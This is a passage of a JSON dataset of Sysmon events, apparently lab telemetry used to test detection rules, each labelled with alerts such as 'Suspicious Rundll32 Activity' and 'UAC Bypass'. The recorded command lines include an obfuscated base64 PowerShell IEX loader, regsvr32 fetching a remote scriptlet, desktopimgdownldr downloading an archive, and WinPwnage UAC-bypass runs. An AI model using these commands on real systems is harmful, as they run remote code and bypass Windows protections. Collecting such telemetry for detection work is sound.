(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Always Install Elevated MSI Spawned Cmd And Powershell"],"event":{"Event":{"EventData":{"CommandLine":"cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution_attributes":{"ProcessID":2044,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious ftp.exe"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" -s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating 